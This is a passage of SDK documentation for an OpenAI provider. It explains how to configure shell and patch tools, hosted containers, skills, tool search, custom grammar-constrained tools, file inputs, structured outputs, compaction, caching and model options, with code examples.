    shell: openai.tools.shell({
      execute: async ({ action }) => {
        // ... your implementation, e.g. sandbox access ...
        return { output: results };
      },
    }),
  },
  prompt: 'List the files in the current directory and show disk usage.',
});

Hosted Container (auto)

Set environment.type to 'containerAuto' to run commands in an OpenAI-hosted container. No execute callback is needed — OpenAI handles execution server-side:

const result = await generateText({
  model: openai('gpt-5.2'),
  tools: {
    shell: openai.tools.shell({
      environment: {
        type: 'containerAuto',
        // optional configuration:
        memoryLimit: '4g',
        fileIds: ['file-abc123'],
        networkPolicy: {
          type: 'allowlist',
          allowedDomains: ['example.com'],
        },
      },
    }),
  },
  prompt: 'Install numpy and compute the eigenvalues of a 3x3 matrix.',
});

The containerAuto environment supports:

fileIds string[] - File IDs to make available in the container
memoryLimit '1g' | '4g' | '16g' | '64g' - Memory limit for the container
networkPolicy - Network access policy:
- { type: 'disabled' } — no network access
- { type: 'allowlist', allowedDomains: string[], domainSecrets?: Array<{ domain, name, value }> } — allow specific domains with optional secrets

Existing Container Reference

Set environment.type to 'containerReference' to use an existing container by ID:

const result = await generateText({
  model: openai('gpt-5.2'),
  tools: {
    shell: openai.tools.shell({
      environment: {
        type: 'containerReference',
        containerId: 'cntr_abc123',
      },
    }),
  },
  prompt: 'Check the status of running processes.',
});

Execute Callback

For local execution (default or type: 'local'), your execute function must return an output array with results for each command:

stdout string - Standard output from the command
stderr string - Standard error from the command
outcome - Either { type: 'timeout' } or { type: 'exit', exitCode: number }

Skills

Skills are versioned bundles of files with a SKILL.md manifest that extend the shell tool's capabilities. They can be attached to both containerAuto and local environments.

Container skills support two formats — by reference (for skills uploaded to OpenAI) or inline (as a base64-encoded zip):

const result = await generateText({
  model: openai('gpt-5.2'),
  tools: {
    shell: openai.tools.shell({
      environment: {
        type: 'containerAuto',
        skills: [
          // By reference:
          { type: 'skillReference', skillId: 'skill_abc123' },
          // Or inline:
          {
            type: 'inline',
            name: 'my-skill',
            description: 'What this skill does',
            source: {
              type: 'base64',
              mediaType: 'application/zip',
              data: readFileSync('./my-skill.zip').toString('base64'),
            },
          },
        ],
      },
    }),
  },
  prompt: 'Use the skill to solve this problem.',
});

Local skills point to a directory on disk containing a SKILL.md file:

const result = await generateText({
  model: openai('gpt-5.2'),
  tools: {
    shell: openai.tools.shell({
      execute: async ({ action }) => {
        // ... your local execution implementation ...
        return { output: results };
      },
      environment: {
        type: 'local',
        skills: [
          {
            name: 'my-skill',
            description: 'What this skill does',
            path: resolve('path/to/skill-directory'),
          },
        ],
      },
    }),
  },
  prompt: 'Use the skill to solve this problem.',
  stopWhen: isStepCount(5),
});

For more details on creating skills, see the OpenAI Skills documentation.

Apply Patch Tool

import { openai } from '@ai-sdk/openai';
import { generateText, isStepCount } from 'ai';

const result = await generateText({
  model: openai('gpt-5.1'),
  tools: {
    apply_patch: openai.tools.applyPatch({
      execute: async ({ callId, operation }) => {
        // ... your implementation for applying the diffs.
      },
    }),
  },
  prompt: 'Create a python file that calculates the factorial of a number',
  stopWhen: isStepCount(5),
});

Your execute function must return:

status 'completed' | 'failed' - Whether the patch was applied successfully
output string (optional) - Human-readable log text (e.g., results or error messages)

Tool Search

There are two execution modes:

Server-executed (hosted): OpenAI searches across the deferred tools declared in the request and returns the loaded subset in the same response. No extra round-trip is needed.
Client-executed: The model emits a tool_search_call, your application performs the lookup, and you return the matching tools via the execute callback.

Server-Executed (Hosted) Tool Search

Use hosted tool search when the candidate tools are already known at request time. Add openai.tools.toolSearch() with no arguments and mark your tools with deferLoading: true:

import { openai } from '@ai-sdk/openai';
import { generateText, tool, isStepCount } from 'ai';
import { z } from 'zod';

const result = await generateText({
  model: openai.responses('gpt-5.4'),
  prompt: 'What is the weather in San Francisco?',
  stopWhen: isStepCount(10),
  tools: {
    toolSearch: openai.tools.toolSearch(),

    get_weather: tool({
      description: 'Get the current weather at a specific location',
      inputSchema: z.object({
        location: z.string(),
        unit: z.enum(['celsius', 'fahrenheit']),
      }),
      execute: async ({ location, unit }) => ({
        location,
        temperature: unit === 'celsius' ? 18 : 64,
      }),
      providerOptions: {
        openai: { deferLoading: true },
      },
    }),

    search_files: tool({
      description: 'Search through files in the workspace',
      inputSchema: z.object({ query: z.string() }),
      execute: async ({ query }) => ({
        results: [`Found 3 files matching "${query}"`],
      }),
      providerOptions: {
        openai: { deferLoading: true },
      },
    }),
  },
});

Client-Executed Tool Search

import { openai } from '@ai-sdk/openai';
import { generateText, tool, isStepCount } from 'ai';
import { z } from 'zod';

const result = await generateText({
  model: openai.responses('gpt-5.4'),
  prompt: 'What is the weather in San Francisco?',
  stopWhen: isStepCount(10),
  tools: {
    toolSearch: openai.tools.toolSearch({
      execution: 'client',
      description: 'Search for available tools based on what the user needs.',
      parameters: {
        type: 'object',
        properties: {
          goal: {
            type: 'string',
            description: 'What the user is trying to accomplish',
          },
        },
        required: ['goal'],
        additionalProperties: false,
      },
      execute: async ({ arguments: args }) => {
        // Your custom tool discovery logic here.
        // Return the tools that match the search goal.
        return {
          tools: [
            {
              type: 'function',
              name: 'get_weather',
              description: 'Get the current weather at a specific location',
              deferLoading: true,
              parameters: {
                type: 'object',
                properties: {
                  location: { type: 'string' },
                },
                required: ['location'],
                additionalProperties: false,
              },
            },
          ],
        };
      },
    }),

    get_weather: tool({
      description: 'Get the current weather at a specific location',
      inputSchema: z.object({ location: z.string() }),
      execute: async ({ location }) => ({
        location,
        temperature: 64,
        condition: 'Partly cloudy',
      }),
      providerOptions: {
        openai: { deferLoading: true },
      },
    }),
  },
});

In client mode, the flow spans two steps:

Step 1: The model emits a tool_search_call with execution: 'client' and a non-null call_id. The SDK calls your execute callback with the search arguments. Your callback returns the discovered tools.
Step 2: The SDK sends the tool_search_output (with the matching call_id) back to the model. The model can now call the loaded tools as normal function calls.

For more details, see the OpenAI Tool Search documentation.

Custom Tool

import { openai } from '@ai-sdk/openai';
import { generateText, isStepCount } from 'ai';

const result = await generateText({
  model: openai.responses('gpt-5.2-codex'),
  tools: {
    write_sql: openai.tools.customTool({
      description: 'Write a SQL SELECT query to answer the user question.',
      format: {
        type: 'grammar',
        syntax: 'regex',
        definition: 'SELECT .+',
      },
      execute: async input => {
        // input is a raw string matching the grammar, e.g. "SELECT * FROM users WHERE age > 25"
        const rows = await db.query(input);
        return JSON.stringify(rows);
      },
    }),
  },
  toolChoice: 'required',
  prompt: 'Write a SQL query to get all users older than 25.',
  stopWhen: isStepCount(3),
});

Custom tools also work with streamText:

import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';

const result = streamText({
  model: openai.responses('gpt-5.2-codex'),
  tools: {
    write_sql: openai.tools.customTool({
      description: 'Write a SQL SELECT query to answer the user question.',
      format: {
        type: 'grammar',
        syntax: 'regex',
        definition: 'SELECT .+',
      },
    }),
  },
  toolChoice: 'required',
  prompt: 'Write a SQL query to get all users older than 25.',
});

for await (const chunk of result.fullStream) {
  if (chunk.type === 'tool-call') {
    console.log(`Tool: ${chunk.toolName}`);
    console.log(`Input: ${chunk.input}`);
  }
}

The custom tool can be configured with:

description string (optional) - A description of what the tool does, to help the model understand when to use it.
format object (optional) - The output format constraint. Omit for unconstrained text output.
- type 'grammar' | 'text' - The format type. Use 'grammar' for constrained output or 'text' for explicit unconstrained text.
- syntax 'regex' | 'lark' - (grammar only) The grammar syntax. Use 'regex' for regular expression patterns or 'lark' for Lark parser grammar.
- definition string - (grammar only) The grammar definition string (a regex pattern or Lark grammar).
execute function (optional) - An async function that receives the raw string input and returns a string result. Enables multi-turn tool calling.

Image Inputs

The OpenAI Responses API supports Image inputs for appropriate models. You can pass Image files as part of the message content using the 'image' type:

const result = await generateText({
  model: openai('gpt-5'),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'Please describe the image.',
        },
        {
          type: 'image',
          image: readFileSync('./data/image.png'),
        },
      ],
    },
  ],
});

The model will have access to the image and will respond to questions about it. The image should be passed using the image field.

You can also pass a file-id from the OpenAI Files API.

{
  type: 'image',
  image: 'file-8EFBcWHsQxZV7YGezBC1fq'
}

You can also pass the URL of an image.

{
  type: 'image',
  image: 'https://sample.edu/image.png',
}

PDF Inputs

The OpenAI Responses API supports reading PDF files. You can pass PDF files as part of the message content using the file type:

const result = await generateText({
  model: openai('gpt-5'),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'What is an embedding model?',
        },
        {
          type: 'file',
          data: readFileSync('./data/ai.pdf'),
          mediaType: 'application/pdf',
          filename: 'ai.pdf', // optional
        },
      ],
    },
  ],
});

You can also pass a file-id from the OpenAI Files API.

{
  type: 'file',
  data: 'file-8EFBcWHsQxZV7YGezBC1fq',
  mediaType: 'application/pdf',
}

You can also pass the URL of a pdf.

{
  type: 'file',
  data: 'https://sample.edu/example.pdf',
  mediaType: 'application/pdf',
  filename: 'ai.pdf', // optional
}

Structured Outputs

The OpenAI Responses API supports structured outputs. You can use generateText or streamText with Output to enforce structured outputs.

const result = await generateText({
  model: openai('gpt-4.1'),
  output: Output.object({
    schema: z.object({
      recipe: z.object({
        name: z.string(),
        ingredients: z.array(
          z.object({
            name: z.string(),
            amount: z.string(),
          }),
        ),
        steps: z.array(z.string()),
      }),
    }),
  }),
  prompt: 'Generate a lasagna recipe.',
});

Typed providerMetadata in Text Parts

When using the OpenAI Responses API, the SDK attaches OpenAI-specific metadata to output parts via providerMetadata.

For text parts, when part.type === 'text', the providerMetadata is provided in the form of OpenaiResponsesTextProviderMetadata.

This metadata includes the following fields:

itemId The ID of the output item in the Responses API.
annotations (optional) An array of annotation objects generated by the model. If no annotations are present, this property itself may be omitted (undefined).

Each element in annotations is a discriminated union with a required type field. Supported types include, for example:
- url_citation
- file_citation
- container_file_citation
- file_path
These annotations directly correspond to the annotation objects defined by the Responses API and can be used for inline reference rendering or output analysis. For details, see the official OpenAI documentation: Responses API – output text annotations.

import {
  openai,
  type OpenaiResponsesTextProviderMetadata,
} from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai('gpt-4.1-mini'),
  prompt:
    'Create a program that generates five random numbers between 1 and 100 with two decimal places, and show me the execution results. Also save the result to a file.',
  tools: {
    code_interpreter: openai.tools.codeInterpreter(),
    web_search: openai.tools.webSearch(),
    file_search: openai.tools.fileSearch({ vectorStoreIds: ['vs_1234'] }), // requires a configured vector store
  },
});

for (const part of result.content) {
  if (part.type === 'text') {
    const providerMetadata = part.providerMetadata as
      | OpenaiResponsesTextProviderMetadata
      | undefined;
    if (!providerMetadata) continue;
    const { itemId: _itemId, annotations } = providerMetadata.openai;

    if (!annotations) continue;
    for (const annotation of annotations) {
      switch (annotation.type) {
        case 'url_citation':
          // url_citation is returned from web_search and provides:
          // properties: type, url, title, start_index and end_index
          break;
        case 'file_citation':
          // file_citation is returned from file_search and provides:
          // properties: type, file_id, filename and index
          break;
        case 'container_file_citation':
          // container_file_citation is returned from code_interpreter and provides:
          // properties: type, container_id, file_id, filename, start_index and end_index
          break;
        case 'file_path':
          // file_path provides:
          // properties: type, file_id and index
          break;
        default: {
          const _exhaustiveCheck: never = annotation;
          throw new Error(
            `Unhandled annotation: ${JSON.stringify(_exhaustiveCheck)}`,
          );
        }
      }
    }
  }
}

Typed providerMetadata in Reasoning Parts

When using the OpenAI Responses API, reasoning output parts can include provider metadata. To handle this metadata in a type-safe way, use OpenaiResponsesReasoningProviderMetadata.

For reasoning parts, when part.type === 'reasoning', the providerMetadata is provided in the form of OpenaiResponsesReasoningProviderMetadata.

This metadata includes the following fields:

itemId
The ID of the reasoning item in the Responses API.
reasoningEncryptedContent (optional)
Encrypted reasoning content (only returned when requested via include: ['reasoning.encrypted_content']).

import {
  openai,
  type OpenaiResponsesReasoningProviderMetadata,
  type OpenAILanguageModelResponsesOptions,
} from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai('gpt-5'),
  prompt: 'How many "r"s are in the word "strawberry"?',
  providerOptions: {
    openai: {
      store: false,
      include: ['reasoning.encrypted_content'],
    } satisfies OpenAILanguageModelResponsesOptions,
  },
});

for (const part of result.content) {
  if (part.type === 'reasoning') {
    const providerMetadata = part.providerMetadata as
      | OpenaiResponsesReasoningProviderMetadata
      | undefined;

    const { itemId, reasoningEncryptedContent } =
      providerMetadata?.openai ?? {};
    console.log(itemId, reasoningEncryptedContent);
  }
}

Typed providerMetadata in Source Document Parts

For source document parts, when part.type === 'source' and sourceType === 'document', the providerMetadata is provided as OpenaiResponsesSourceDocumentProviderMetadata.

This metadata is also a discriminated union with a required type field. Supported types include:

file_citation
container_file_citation
file_path

Each type includes the identifiers required to work with the referenced resource, such as fileId and containerId.

import {
  openai,
  type OpenaiResponsesSourceDocumentProviderMetadata,
} from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai('gpt-4.1-mini'),
  prompt:
    'Create a program that generates five random numbers between 1 and 100 with two decimal places, and show me the execution results. Also save the result to a file.',
  tools: {
    code_interpreter: openai.tools.codeInterpreter(),
    web_search: openai.tools.webSearch(),
    file_search: openai.tools.fileSearch({ vectorStoreIds: ['vs_1234'] }), // requires a configured vector store
  },
});

for (const part of result.content) {
  if (part.type === 'source') {
    if (part.sourceType === 'document') {
      const providerMetadata = part.providerMetadata as
        | OpenaiResponsesSourceDocumentProviderMetadata
        | undefined;
      if (!providerMetadata) continue;
      const annotation = providerMetadata.openai;
      switch (annotation.type) {
        case 'file_citation':
          // file_citation is returned from file_search and provides:
          // properties: type, fileId and index
          // The filename can be accessed via part.filename.
          break;
        case 'container_file_citation':
          // container_file_citation is returned from code_interpreter and provides:
          // properties: type, containerId and fileId
          // The filename can be accessed via part.filename.
          break;
        case 'file_path':
          // file_path provides:
          // properties: type, fileId and index
          break;
        default: {
          const _exhaustiveCheck: never = annotation;
          throw new Error(
            `Unhandled annotation: ${JSON.stringify(_exhaustiveCheck)}`,
          );
        }
      }
    }
  }
}

Compaction

The OpenAI Responses API supports server-side context compaction. When enabled, the server automatically compresses conversation context when token usage crosses a configured threshold. This is useful for long-running conversations or agent loops where you want to stay within token limits without manually managing context.

The compaction item returned by the server is opaque and encrypted — it carries forward key prior state and reasoning into the next turn using fewer tokens. The AI SDK handles this automatically: compaction items are returned as text parts with special providerMetadata, and when passed back in subsequent requests they are sent as compaction input items.

import {
  openai,
  type OpenAILanguageModelResponsesOptions,
} from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai.responses('gpt-5.2'),
  messages: conversationHistory,
  providerOptions: {
    openai: {
      store: false,
      contextManagement: [{ type: 'compaction', compactThreshold: 50000 }],
    } satisfies OpenAILanguageModelResponsesOptions,
  },
});

Configuration:

type — Must be 'compaction'
compactThreshold — The token count at which compaction is triggered. When the rendered input token count crosses this threshold, the server runs a compaction pass before continuing inference.

Detecting Compaction in Streams

When using streamText, you can detect compaction by checking the providerMetadata on text-start and text-end events:

import {
  openai,
  type OpenAILanguageModelResponsesOptions,
} from '@ai-sdk/openai';
import { streamText } from 'ai';

const result = streamText({
  model: openai.responses('gpt-5.2'),
  messages: conversationHistory,
  providerOptions: {
    openai: {
      store: false,
      contextManagement: [{ type: 'compaction', compactThreshold: 50000 }],
    } satisfies OpenAILanguageModelResponsesOptions,
  },
});

for await (const part of result.fullStream) {
  switch (part.type) {
    case 'text-start': {
      const isCompaction = part.providerMetadata?.openai?.type === 'compaction';
      if (isCompaction) {
        // ... your logic
      }
      break;
    }
    case 'text-end': {
      const isCompaction = part.providerMetadata?.openai?.type === 'compaction';
      if (isCompaction) {
        // ... your logic
      }
      break;
    }
    case 'text-delta': {
      process.stdout.write(part.text);
      break;
    }
  }
}

Compaction in UI Applications

When using useChat or other UI hooks, compaction items appear as text parts with providerMetadata. You can detect and style them differently in your UI:

{
  message.parts.map((part, index) => {
    if (part.type === 'text') {
      const isCompaction =
        (part.providerMetadata?.openai as { type?: string } | undefined)
          ?.type === 'compaction';

      if (isCompaction) {
        return (
          <div
            key={index}
            className="bg-yellow-100 border-l-4 border-yellow-500 p-2"
          >
            <span className="font-bold">[Context Compacted]</span>
            <p className="text-sm text-yellow-700">
              The server compressed the conversation context to reduce token
              usage.
            </p>
          </div>
        );
      }
      return <div key={index}>{part.text}</div>;
    }
  });
}

The metadata includes the following fields:

type — Always 'compaction'
itemId string — The ID of the compaction item in the Responses API
encryptedContent string (optional) — The encrypted compaction state. This is automatically sent back to the API when the message is included in subsequent requests.

Chat Models

const model = openai.chat('gpt-5');

OpenAI chat models support also some model specific provider options that are not part of the standard call settings. You can pass them in the providerOptions argument:

import { openai, type OpenAILanguageModelChatOptions } from '@ai-sdk/openai';

const model = openai.chat('gpt-5');

await generateText({
  model,
  providerOptions: {
    openai: {
      logitBias: {
        // optional likelihood for specific tokens
        '50256': -100,
      },
      user: 'test-user', // optional unique user identifier
    } satisfies OpenAILanguageModelChatOptions,
  },
});

The following optional provider options are available for OpenAI chat models:

logitBias Record<number, number>

Modifies the likelihood of specified tokens appearing in the completion.

Accepts a JSON object that maps tokens (specified by their token ID in the GPT tokenizer) to an associated bias value from -100 to 100. You can use this tokenizer tool to convert text to token IDs. Mathematically, the bias is added to the logits generated by the model prior to sampling. The exact effect will vary per model, but values between -1 and 1 should decrease or increase likelihood of selection; values like -100 or 100 should result in a ban or exclusive selection of the relevant token.

As an example, you can pass {"50256": -100} to prevent the token from being generated.
logprobs boolean | number

Return the log probabilities of the tokens. Including logprobs will increase the response size and can slow down response times. However, it can be useful to better understand how the model is behaving.

Setting to true will return the log probabilities of the tokens that were generated.

Setting to a number will return the log probabilities of the top n tokens that were generated.
parallelToolCalls boolean

Whether to enable parallel function calling during tool use. Defaults to true.
user string

A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Learn more.
reasoningEffort 'minimal' | 'low' | 'medium' | 'high' | 'xhigh'

Reasoning effort for reasoning models. Defaults to medium. If you use providerOptions to set the reasoningEffort option, this model setting will be ignored.
maxCompletionTokens number

Maximum number of completion tokens to generate. Useful for reasoning models.
store boolean

Whether to enable persistence in Responses API.
metadata Record<string, string>

Metadata to associate with the request.
prediction Record<string, any>

Parameters for prediction mode.
serviceTier 'auto' | 'flex' | 'priority' | 'default'

Service tier for the request. Set to 'flex' for 50% cheaper processing at the cost of increased latency (available for o3, o4-mini, and gpt-5 models). Set to 'priority' for faster processing with Enterprise access (available for gpt-4, gpt-5, gpt-5-mini, o3, o4-mini; gpt-5-nano is not supported).

Defaults to 'auto'.
strictJsonSchema boolean

Whether to use strict JSON schema validation. Defaults to true.
textVerbosity 'low' | 'medium' | 'high'

Controls the verbosity of the model's responses. Lower values will result in more concise responses, while higher values will result in more verbose responses.
promptCacheKey string

A cache key for manual prompt caching control. Used by OpenAI to cache responses for similar requests to optimize your cache hit rates.
promptCacheRetention 'in_memory' | '24h'

The retention policy for the prompt cache. Set to '24h' to enable extended prompt caching, which keeps cached prefixes active for up to 24 hours. Defaults to 'in_memory' for standard prompt caching. Note: '24h' is currently only available for the 5.1 series of models.
safetyIdentifier string

A stable identifier used to help detect users of your application that may be violating OpenAI's usage policies. The IDs should be a string that uniquely identifies each user.
systemMessageMode 'system' | 'developer' | 'remove'

Override the system message mode for this model. If not specified, the mode is automatically determined based on the model. system uses the 'system' role for system messages (default for most models); developer uses the 'developer' role (used by reasoning models); remove removes system messages entirely.
forceReasoning boolean

Force treating this model as a reasoning model. This is useful for "stealth" reasoning models (e.g. via a custom baseURL) where the model ID is not recognized by the SDK's allowlist. When enabled, the SDK applies reasoning-model parameter compatibility rules and defaults systemMessageMode to developer unless overridden.

Reasoning

OpenAI has introduced the o1,o3, and o4 series of reasoning models. Currently, o4-mini, o3, o3-mini, and o1 are available via both the chat and responses APIs. The model gpt-5.1-codex-mini is available only via the responses API.

Reasoning models currently only generate text, have several limitations, and are only supported using generateText and streamText.

They support additional settings and response metadata:

You can use providerOptions to set
- the reasoningEffort option (or alternatively the reasoningEffort model setting), which determines the amount of reasoning the model performs.
You can use response providerMetadata to access the number of reasoning tokens that the model generated.

import { openai, type OpenAILanguageModelChatOptions } from '@ai-sdk/openai';
import { generateText } from 'ai';

const { text, usage, providerMetadata } = await generateText({
  model: openai.chat('gpt-5'),
  prompt: 'Invent a new holiday and describe its traditions.',
  providerOptions: {
    openai: {
      reasoningEffort: 'low',
    } satisfies OpenAILanguageModelChatOptions,
  },
});

console.log(text);
console.log('Usage:', {
  ...usage,
  reasoningTokens: providerMetadata?.openai?.reasoningTokens,
});

You can control how system messages are handled by providerOptions systemMessageMode:
- developer: treat the prompt as a developer message (default for reasoning models).
- system: keep the system message as a system-level instruction.
- remove: remove the system message from the messages.

import { openai, type OpenAILanguageModelChatOptions } from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai.chat('gpt-5'),
  messages: [
    { role: 'system', content: 'You are a helpful assistant.' },
    { role: 'user', content: 'Tell me a joke.' },
  ],
  providerOptions: {
    openai: {
      systemMessageMode: 'system',
    } satisfies OpenAILanguageModelChatOptions,
  },
});

Strict Structured Outputs

Strict structured outputs are enabled by default. You can disable them by setting the strictJsonSchema option to false.

import { openai, OpenAILanguageModelChatOptions } from '@ai-sdk/openai';
import { generateText, Output } from 'ai';
import { z } from 'zod';

const result = await generateText({
  model: openai.chat('gpt-4o-2024-08-06'),
  providerOptions: {
    openai: {
      strictJsonSchema: false,
    } satisfies OpenAILanguageModelChatOptions,
  },
  output: Output.object({
    schema: z.object({
      name: z.string(),
      ingredients: z.array(
        z.object({
          name: z.string(),
          amount: z.string(),
        }),
      ),
      steps: z.array(z.string()),
    }),
    schemaName: 'recipe',
    schemaDescription: 'A recipe for lasagna.',
  }),
  prompt: 'Generate a lasagna recipe.',
});

console.log(JSON.stringify(result.output, null, 2));

For example, optional schema properties are not supported. You need to change Zod .nullish() and .optional() to .nullable().

Logprobs

OpenAI provides logprobs information for completion/chat models. You can access it in the providerMetadata object.

import { openai, type OpenAILanguageModelChatOptions } from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai.chat('gpt-5'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
  providerOptions: {
    openai: {
      // this can also be a number,
      // refer to logprobs provider options section for more
      logprobs: true,
    } satisfies OpenAILanguageModelChatOptions,
  },
});

const openaiMetadata = (await result.providerMetadata)?.openai;

const logprobs = openaiMetadata?.logprobs;

Image Support

The OpenAI Chat API supports Image inputs for appropriate models. You can pass Image files as part of the message content using the 'image' type:

const result = await generateText({
  model: openai.chat('gpt-5'),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'Please describe the image.',
        },
        {
          type: 'image',
          image: readFileSync('./data/image.png'),
        },
      ],
    },
  ],
});

The model will have access to the image and will respond to questions about it. The image should be passed using the image field.

You can also pass the URL of an image.

{
  type: 'image',
  image: 'https://sample.edu/image.png',
}

PDF support

The OpenAI Chat API supports reading PDF files. You can pass PDF files as part of the message content using the file type:

const result = await generateText({
  model: openai.chat('gpt-5'),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'What is an embedding model?',
        },
        {
          type: 'file',
          data: readFileSync('./data/ai.pdf'),
          mediaType: 'application/pdf',
          filename: 'ai.pdf', // optional
        },
      ],
    },
  ],
});

You can also pass a file-id from the OpenAI Files API.

{
  type: 'file',
  data: 'file-8EFBcWHsQxZV7YGezBC1fq',
  mediaType: 'application/pdf',
}

You can also pass the URL of a PDF.

{
  type: 'file',
  data: 'https://sample.edu/example.pdf',
  mediaType: 'application/pdf',
  filename: 'ai.pdf', // optional
}

Predicted Outputs

const result = streamText({
  model: openai.chat('gpt-5'),
  messages: [
    {
      role: 'user',
      content: 'Replace the Username property with an Email property.',
    },
    {
      role: 'user',
      content: existingCode,
    },
  ],
  providerOptions: {
    openai: {
      prediction: {
        type: 'content',
        content: existingCode,
      },
    } satisfies OpenAILanguageModelChatOptions,
  },
});

OpenAI provides usage information for predicted outputs (acceptedPredictionTokens and rejectedPredictionTokens). You can access it in the providerMetadata object.

const openaiMetadata = (await result.providerMetadata)?.openai;

const acceptedPredictionTokens = openaiMetadata?.acceptedPredictionTokens;
const rejectedPredictionTokens = openaiMetadata?.rejectedPredictionTokens;

Image Detail

You can use the openai provider option to set the image input detail to high, low, or auto:

const result = await generateText({
  model: openai.chat('gpt-5'),
  messages: [
    {
      role: 'user',
      content: [
        { type: 'text', text: 'Describe the image in detail.' },
        {
          type: 'image',
          image:
            'https://github.com/vercel/ai/blob/main/examples/ai-functions/data/comic-cat.png?raw=true',

          // OpenAI specific options - image detail:
          providerOptions: {
            openai: { imageDetail: 'low' },
          },
        },
      ],
    },
  ],
});

Distillation

import { openai, type OpenAILanguageModelChatOptions } from '@ai-sdk/openai';
import { generateText } from 'ai';
import 'dotenv/config';

async function main() {
  const { text, usage } = await generateText({
    model: openai.chat('gpt-4o-mini'),
    prompt: 'Who worked on the original macintosh?',
    providerOptions: {
      openai: {
        store: true,
        metadata: {
          custom: 'value',
        },
      } satisfies OpenAILanguageModelChatOptions,
    },
  });

  console.log(text);
  console.log();
  console.log('Usage:', usage);
}

main().catch(console.error);

Prompt Caching

OpenAI has introduced Prompt Caching for supported models including gpt-4o and gpt-4o-mini.

Prompt caching is automatically enabled for these models, when the prompt is 1024 tokens or longer. It does not need to be explicitly enabled.
You can use response providerMetadata to access the number of prompt tokens that were a cache hit.
Note that caching behavior is dependent on load on OpenAI's infrastructure. Prompt prefixes generally remain in the cache following 5-10 minutes of inactivity before they are evicted, but during off-peak periods they may persist for up to an hour.

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';

const { text, usage, providerMetadata } = await generateText({
  model: openai.chat('gpt-4o-mini'),
  prompt: `A 1024-token or longer prompt...`,
});

console.log(`usage:`, {
  ...usage,
  cachedPromptTokens: providerMetadata?.openai?.cachedPromptTokens,
});

To improve cache hit rates, you can manually control caching using the promptCacheKey option:

import { openai, type OpenAILanguageModelChatOptions } from '@ai-sdk/openai';
import { generateText } from 'ai';

const { text, usage, providerMetadata } = await generateText({
  model: openai.chat('gpt-5'),
  prompt: `A 1024-token or longer prompt...`,
  providerOptions: {
    openai: {
      promptCacheKey: 'my-custom-cache-key-123',
    } satisfies OpenAILanguageModelChatOptions,
  },
});

console.log(`usage:`, {
  ...usage,
  cachedPromptTokens: providerMetadata?.openai?.cachedPromptTokens,
});

For GPT-5.1 models, you can enable extended prompt caching that keeps cached prefixes active for up to 24 hours:

import { openai, type OpenAILanguageModelChatOptions } from '@ai-sdk/openai';
import { generateText } from 'ai';

const { text, usage, providerMetadata } = await generateText({
  model: openai.chat('gpt-5.1'),
  prompt: `A 1024-token or longer prompt...`,
  providerOptions: {
    openai: {
      promptCacheKey: 'my-custom-cache-key-123',
      promptCacheRetention: '24h', // Extended caching for GPT-5.1
    } satisfies OpenAILanguageModelChatOptions,
  },
});

console.log(`usage:`, {
  ...usage,
  cachedPromptTokens: providerMetadata?.openai?.cachedPromptTokens,
});

Audio Input

With the gpt-4o-audio-preview model, you can pass audio files to the model.

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';

const result = await generateText({
  model: openai.chat('gpt-4o-audio-preview'),
  messages: [
    {
      role: 'user',
      content: [
        { type: 'text', text: 'What is the audio saying?' },
        {
          type: 'file',
          mediaType: 'audio/mpeg',
          data: readFileSync('./data/galileo.mp3'),
        },
      ],
    },
  ],
});

Completion Models

You can create models that call the OpenAI completions API using the .completion() factory method. The first argument is the model id. Currently only gpt-3.5-turbo-instruct is supported.

const model = openai.completion('gpt-3.5-turbo-instruct');

OpenAI completion models support also some model specific settings that are not part of the standard call settings. You can pass them as an options argument:

const model = openai.completion('gpt-3.5-turbo-instruct');

await model.doGenerate({
  providerOptions: {
    openai: {
      echo: true, // optional, echo the prompt in addition to the completion
      logitBias: {
        // optional likelihood for specific tokens
        '50256': -100,
      },
      suffix: 'some text', // optional suffix that comes after a completion of inserted text
      user: 'test-user', // optional unique user identifier
    } satisfies OpenAILanguageModelCompletionOptions,
  },
});

The following optional provider options are available for OpenAI completion models:

echo: boolean

Echo back the prompt in addition to the completion.
logitBias Record<number, number>

Modifies the likelihood of specified tokens appearing in the completion.

Accepts a JSON object that maps tokens (specified by their token ID in the GPT tokenizer) to an associated bias value from -100 to 100. You can use this tokenizer tool to convert text to token IDs. Mathematically, the bias is added to the logits generated by the model prior to sampling. The exact effect will vary per model, but values between -1 and 1 should decrease or increase likelihood of selection; values like -100 or 100 should result in a ban or exclusive selection of the relevant token.

As an example, you can pass {"50256": -100} to prevent the <|endoftext|> token from being generated.
logprobs boolean | number

Return the log probabilities of the tokens. Including logprobs will increase the response size and can slow down response times. However, it can be useful to better understand how the model is behaving.

Setting to true will return the log probabilities of the tokens that were generated.

Setting to a number will return the log probabilities of the top n tokens that were generated.
suffix string

The suffix that comes after a completion of inserted text.
user string

A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Learn more.

Model Capabilities

Model	Image Input	Audio Input	Object Generation	Tool Usage
`gpt-5.4-pro`
`gpt-5.4`
`gpt-5.4-mini`
`gpt-5.4-nano`
`gpt-5.3-chat-latest`
`gpt-5.2-pro`
`gpt-5.2-chat-latest`
`gpt-5.2`
`gpt-5.1-codex-mini`
`gpt-5.1-codex`
`gpt-5.1-chat-latest`
`gpt-5.1`
`gpt-5-pro`
`gpt-5`
`gpt-5-mini`
`gpt-5-nano`
`gpt-5-codex`
`gpt-5-chat-latest`
`gpt-4.1`
`gpt-4.1-mini`
`gpt-4.1-nano`
`gpt-4o`
`gpt-4o-mini`

Embedding Models

You can create models that call the OpenAI embeddings API using the .embedding() factory method.

const model = openai.embedding('text-embedding-3-large');

OpenAI embedding models support several additional provider options. You can pass them as an options argument:

import { openai, type OpenAIEmbeddingModelOptions } from '@ai-sdk/openai';
